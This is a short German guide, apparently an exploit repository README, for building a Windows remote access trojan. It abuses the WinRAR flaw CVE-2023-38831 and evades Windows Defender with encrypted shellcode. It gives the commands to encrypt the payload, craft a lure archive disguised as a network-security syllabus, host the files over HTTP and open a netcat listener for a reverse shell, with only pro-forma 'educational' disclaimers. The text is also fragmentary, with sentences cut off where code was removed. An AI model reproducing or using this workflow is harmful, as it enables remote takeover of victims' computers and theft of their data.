
Remote Access Trojan (RAT) für Windows x64 unter Verwendung einer Kombination aus der Schwachstelle CVE-2023-38831 (WinRAR < 6.23 Schwachstelle) und Shellcode-Ausnutzungstechnik.
Entwicklung eines Windows x64 RAT unter Verwendung von CVE-2023-38831 (WinRAR < 6.23) und Shellcode-Ausnutzung zur Umgehung von Windows Defender.
Warnung: Diese Informationen dienen ausschließlich Bildungszwecken. Unautorisierte Nutzung dieser Techniken ist illegal und unethisch.
Shellcode erstellen
51721.py, um den initialen Shellcode zu generieren.Shellcode modifizieren und kompilieren
Ausführbare Datei verschlüsseln
decrypt_file.ps1, um die kompilierte ausführbare Datei zu verschlüsseln:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
WinRAR-Archiv erstellen
cve-2023-38831-exp-gen.py, um das Archiv zu erstellen:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Python-Server für Dateidownload einrichten
enc_main.exe und decrypt_file.ps1 enthält.python3 -m http.server 8000
Diese Informationen werden ausschließlich zu Bildungszwecken bereitgestellt. Die Nutzung dieses Exploits ohne ausdrückliche Erlaubnis ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieser Informationen.
Vorbereitung zum Lauschen auf die Reverse-TCP-Shell
nc -lnvp 4444
Reverse-TCP-Shell auslösen